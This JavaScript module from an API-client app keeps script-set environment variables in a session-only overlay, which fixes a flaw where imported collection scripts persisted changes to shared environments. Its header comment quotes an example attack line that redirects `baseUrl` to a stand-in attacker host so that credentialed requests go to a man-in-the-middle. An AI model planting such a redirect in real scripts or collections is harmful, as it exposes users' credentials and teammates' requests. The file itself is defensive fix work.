/**
 * Where `boo.environment.set()` / `pm.environment.set()` writes go.
 *
 * COL-03. They used to go into the user's SELECTED ENVIRONMENT, via
 * `onVariableUpdate(..., { scope: 'environment' })` — a persisted, synced
 * store. An imported collection's test script running
 * `pm.environment.set('baseUrl', 'https://mitm.attacker.example')` therefore
 * redirected every other collection in the workspace that resolves
 * `{{baseUrl}}`, with its real credentials, and in a team workspace the
 * mutation propagated to teammates through the normal sync path.
 *
 * The collection runner never had this problem: it mutates a local copy
 * (`mutableEnv`) that lives for the length of the run and is thrown away
 * after. This module is that same model for the manual editor, widened from
 * "the run" to "this session" — because in the manual editor the run *is* the
 * session. Widening it is what keeps the workflow the persistence existed for:
 * a login request's test script sets `{{token}}` and the next request, in
 * another tab, interpolates it.
 *
 * What it deliberately is NOT: durable. Nothing here is written to disk, put
 * in localStorage, serialized into the git mirror or sent to a teammate. It
 * dies with the session, and it is cleared at sign-out so one account's script
 * output can never colour the next account's requests.
 *
 * Precedence: below `pm.variables.set()` locals (which are per-send) and above
 * every stored scope, matching the environment slot it replaced.
 *
 * Provenance (owner bug report, 16.10.2026): every value remembers WHICH script
 * set it (`<request>:pre` / `<request>:test`). AFTER a request's script phase
 * completes, that phase's values are replaced by exactly what this run set
 * (replaceScriptEnvOverlaySource), so a script that was edited or deleted
 * stops applying on the very next send, instead of its old `{{base_url}}`
 * winning for the rest of the session. The phase runs with its previous values
 * still visible (a token-caching `if (!pm.environment.get('token'))` script
 * must see its own token), an unchanged script that skips a set keeps the
 * value, and a phase that failed or did not run leaves them alone. Values set
 * by OTHER requests (a login request's `{{token}}`) are untouched. An explicit
 * edit of a stored variable by the user also drops that key: the user's value
 * wins.
 */

/** @type {Map<string, { value: string, source: string | null }>} */
const overlay = new Map();

const listeners = new Set();

function notify() {
  for (const fn of listeners) {
    try {
      fn();
    } catch {
      /* a bad subscriber must not break a send */
    }
  }
}

/** Subscribe to overlay changes. Returns an unsubscribe function. */
export function subscribeScriptEnvOverlay(fn) {
  listeners.add(fn);
  return () => listeners.delete(fn);
}

export function getScriptEnvOverlayValue(key) {
  return overlay.has(key) ? overlay.get(key).value : undefined;
}

export function hasScriptEnvOverlayValue(key) {
  return overlay.has(key);
}

/** Plain-object copy, for folding into a script's variable snapshot. */
export function scriptEnvOverlaySnapshot() {
  return Object.fromEntries([...overlay.entries()].map(([k, v]) => [k, v.value]));
}

/** The source key for one request's script phase: `phase` is 'pre' or 'test'. */
export function scriptOverlaySource(requestKey, phase) {
  return requestKey == null || requestKey === '' ? null : `${requestKey}:${phase}`;
}

/**
 * Apply a script's accepted `envMutations`. A `null` value is an `unset()`,
 * which shadows the stored value for this session rather than deleting it —
 * the stored environment is not ours to edit.
 */
export function applyScriptEnvOverlay(mutations, source = null) {
  let changed = false;
  for (const [key, value] of Object.entries(mutations || {})) {
    const next = value === null || value === undefined ? '' : String(value);
    const prev = overlay.get(key);
    if (!prev || prev.value !== next || prev.source !== source) {
      overlay.set(key, { value: next, source });
      changed = true;
    }
  }
  if (changed) notify();
  return changed;
}

/**
 * The script text each source's values came from. A run of the SAME text that
 * does not set a key again keeps it — that is a cache doing its job
 * (`if (!pm.environment.get('token'))` skips the login, a test script sets the
 * token only on a 200). A run of DIFFERENT text (the script was edited, or
 * deleted: '') drops it — that line is gone.
 * @type {Map<string, string>}
 */
const sourceScripts = new Map();

/**
 * A script phase completed: `sources` now hold this run's `mutations` (its
 * accepted envMutations), owned by `sources[0]`. Values the run did not set
 * again are dropped unless `script` is the same text that set them (see
 * sourceScripts); an empty, deleted script therefore drops everything its
 * phase set. `sources` may name the same request under more than one key (a
 * tab id before its first save, the saved id after).
 */
export function replaceScriptEnvOverlaySource(sources, mutations, { script = '' } = {}) {
  const owned = [...new Set((Array.isArray(sources) ? sources : [sources]).filter(Boolean))];
  if (owned.length === 0) return applyScriptEnvOverlay(mutations, null);
  const [primary] = owned;
  const ownedSet = new Set(owned);
  const next = mutations || {};
  const sameScript = owned.some((src) => sourceScripts.get(src) === script);
  let changed = false;
  for (const [key, entry] of overlay) {
    if (!ownedSet.has(entry.source) || Object.prototype.hasOwnProperty.call(next, key)) continue;
    if (sameScript) {
      entry.source = primary;
    } else {
      overlay.delete(key);
      changed = true;
    }
  }
  for (const src of owned) sourceScripts.delete(src);
  if (script) sourceScripts.set(primary, script);
  // applyScriptEnvOverlay notifies on its own changes; notify for the drops.
  const applied = applyScriptEnvOverlay(next, primary);
  if (changed && !applied) notify();
  return changed || applied;
}

/**
 * A request got a new identity (an unsaved tab's first save): what its script
 * phases set under the old key now belongs to the new one, so the next run of
 * the saved request still replaces it.
 */
export function rekeyScriptEnvOverlaySources(fromKey, toKey) {
  if (fromKey == null || toKey == null || String(fromKey) === String(toKey)) return;
  for (const phase of ['pre', 'test']) {
    const from = scriptOverlaySource(String(fromKey), phase);
    const to = scriptOverlaySource(String(toKey), phase);
    for (const entry of overlay.values()) {
      if (entry.source === from) entry.source = to;
    }
    if (sourceScripts.has(from)) {
      sourceScripts.set(to, sourceScripts.get(from));
      sourceScripts.delete(from);
    }
  }
}

/** Drop every value `source` (see scriptOverlaySource) set. */
export function clearScriptEnvOverlayFrom(source) {
  if (!source) return false;
  let changed = false;
  for (const [key, entry] of overlay) {
    if (entry.source === source) {
      overlay.delete(key);
      changed = true;
    }
  }
  if (changed) notify();
  return changed;
}

/**
 * The user edited these stored variables: their values win over a script's.
 * `ignoreCase` for edits that land through the stores' case-insensitive upsert.
 */
export function clearScriptEnvOverlayKeys(keys, { ignoreCase = false } = {}) {
  let changed = false;
  const wanted = new Set((keys || []).map((k) => (ignoreCase ? String(k).toLowerCase() : k)));
  for (const key of [...overlay.keys()]) {
    if (wanted.has(ignoreCase ? key.toLowerCase() : key)) {
      overlay.delete(key);
      changed = true;
    }
  }
  if (changed) notify();
  return changed;
}

export function clearScriptEnvOverlay() {
  sourceScripts.clear();
  if (overlay.size === 0) return;
  overlay.clear();
  notify();
}

// Both logout paths (authStore.logout() and apiClient's 401 interceptor)
// dispatch `auth:logout` on window, so this covers hard and soft sign-out
// without dragging the phoenix socket module into every importer of this file.
if (typeof window !== 'undefined' && typeof window.addEventListener === 'function') {
  window.addEventListener('auth:logout', clearScriptEnvOverlay);
}
